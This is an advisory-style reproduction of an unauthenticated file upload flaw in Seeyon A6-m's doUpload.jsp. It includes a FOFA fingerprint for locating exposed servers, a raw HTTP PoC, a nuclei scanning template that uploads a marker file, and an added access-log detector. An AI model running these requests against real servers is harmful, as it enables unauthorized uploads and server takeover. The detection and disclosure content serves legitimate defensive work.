致远 (Seeyon) A6-m Collaborative Management Software Arbitrary File Upload Vulnerability Reproduction
1. Vulnerability description
The doUpload.jsp interface of the 致远 A6-m collaborative management software is affected by an arbitrary file upload vulnerability. An unauthenticated attacker can upload malicious files through this interface and thereby take control of the server.
2. Vulnerability identifiers

| CVE | CNVD | CNNVD |
|---|---|---|
| - | - | - |

3. Affected scope

| Name | Version |
|---|---|
| - | - |
4. Search fingerprint
FOFA: icon_hash="277494963"
5. PoC

```http
POST http://127.0.0.1/yyoa/portal/tools/doUpload.jsp HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Content-Length: 219
Accept: */*
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvI7BO1Qq69tqF3Fh
Cookie: JSESSIONID=1BDC1511726B24DF9B75FD554960F96A; JSESSIONID=0B4A41EA32B167EC5531DD0F78E4C10D
Origin: http://47.106.219.92:9090/
Accept-Encoding: gzip, deflate, br

------WebKitFormBoundaryvI7BO1Qq69tqF3Fh
Content-Disposition: form-data; name="myfile"; filename="cghn8mdjms.txt"
Content-Type: application/octet-stream

www.cnvd.org.cn
------WebKitFormBoundaryvI7BO1Qq69tqF3Fh--
```

The response contains the name under which the file was stored; the uploaded file was then reachable at:

https://x.x.x.x/yyoa/portal/upload/1709521517843.txt
nuclei template

```yaml
id: seeyon-a6-m-doupload-fileupload

info:
  name: 致远A6-m协同管理软件任意文件上传
  author: hugh
  severity: critical
  description: 致远A6-m协同管理软件任意文件上传
  reference:
    - none
  metadata:
    verified: true
    max-request: 2
    fofa-query: 'icon_hash="277494963"'
  tags: seeyon,oa,fileupload

variables:
  filename: "{{to_lower(rand_base(10))}}"
  boundary: "{{rand_base(16)}}"

http:
  - raw:
      - |
        POST /yyoa/portal/tools/doUpload.jsp HTTP/1.1
        Host: {{Hostname}}
        Content-Length: 298
        Origin: {{BaseURL}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{boundary}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
        Accept: */*
        Cookie: JSESSIONID=1BDC1511726B24DF9B75FD554960F96A; JSESSIONID=0B4A41EA32B167EC5531DD0F78E4C10D
        Connection: close

        ------WebKitFormBoundary{{boundary}}
        Content-Disposition: form-data; name="myfile"; filename="{{filename}}.txt"
        Content-Type: application/octet-stream

        www.cnvd.org.cn
        ------WebKitFormBoundary{{boundary}}--

      - |
        GET /yyoa/portal/upload/{{jspuploadfilename}} HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36

    # Pull the stored file name (13-digit timestamp + .txt) out of the upload response
    # so the second request can fetch it back.
    extractors:
      - type: regex
        name: jspuploadfilename
        part: body
        group: 1
        internal: true
        regex:
          - '(\d{13}\.txt)'

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "status_code == 200 && contains((body_1), 'window.returnValue') && contains((body_2), 'www.cnvd.org.cn')"
```
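The two-step sequence the template relies on (a POST to doUpload.jsp followed shortly by a GET of the stored file under /yyoa/portal/upload/) is also what a defender can look for in web server access logs. The detector below is an added example and not part of the original post; the log lines are constructed, and the 120-second correlation window is an assumption.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample access-log lines (combined log format); not taken from the original post.
SAMPLE_LOG = """\
203.0.113.7 - - [04/Mar/2024:04:25:17 +0000] "POST /yyoa/portal/tools/doUpload.jsp HTTP/1.1" 200 412 "-" "Mozilla/5.0"
203.0.113.7 - - [04/Mar/2024:04:25:18 +0000] "GET /yyoa/portal/upload/1709521517843.txt HTTP/1.1" 200 15 "-" "Mozilla/5.0"
198.51.100.9 - - [04/Mar/2024:09:12:01 +0000] "GET /yyoa/portal/index.jsp HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.9 - - [04/Mar/2024:09:13:44 +0000] "GET /yyoa/portal/upload/1709538824001.jpg HTTP/1.1" 200 8801 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
UPLOAD_ENDPOINT = "/yyoa/portal/tools/doUpload.jsp"                # vulnerable endpoint named in the post
UPLOAD_DIR_RE = re.compile(r"^/yyoa/portal/upload/\d{13}\.\w+$")  # stored-file path pattern from the post
WINDOW_SECONDS = 120  # assumed correlation window between upload POST and fetch


def parse_line(line):
    """Parse one combined-format log line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {"ip": m["ip"], "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
            "method": m["method"], "path": m["path"], "status": int(m["status"])}


def detect(log_text):
    """Return a list of (severity, ip, detail) findings.
    'medium': a POST reached the upload endpoint (may be legitimate use, worth reviewing).
    'high':   the same source fetched a file from the upload directory shortly after its POST."""
    events = [e for e in map(parse_line, log_text.splitlines()) if e]
    upload_posts = defaultdict(list)
    findings = []
    for e in events:
        if e["method"] == "POST" and e["path"] == UPLOAD_ENDPOINT:
            upload_posts[e["ip"]].append(e["ts"])
            findings.append(("medium", e["ip"], f"POST {UPLOAD_ENDPOINT} -> {e['status']}"))
    for e in events:
        if e["method"] != "GET" or e["status"] != 200 or not UPLOAD_DIR_RE.match(e["path"]):
            continue
        if any(0 <= (e["ts"] - t).total_seconds() <= WINDOW_SECONDS for t in upload_posts[e["ip"]]):
            findings.append(("high", e["ip"], f"fetched {e['path']} within {WINDOW_SECONDS}s of upload POST"))
    return findings


if __name__ == "__main__":
    for sev, ip, detail in detect(SAMPLE_LOG):
        print(f"[{sev}] {ip}: {detail}")
```

Only the source that both posted to doUpload.jsp and then retrieved a freshly stored file is raised to high; an ordinary read from the upload directory (198.51.100.9) produces no finding.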
6. Remediation
Upgrade to the latest version.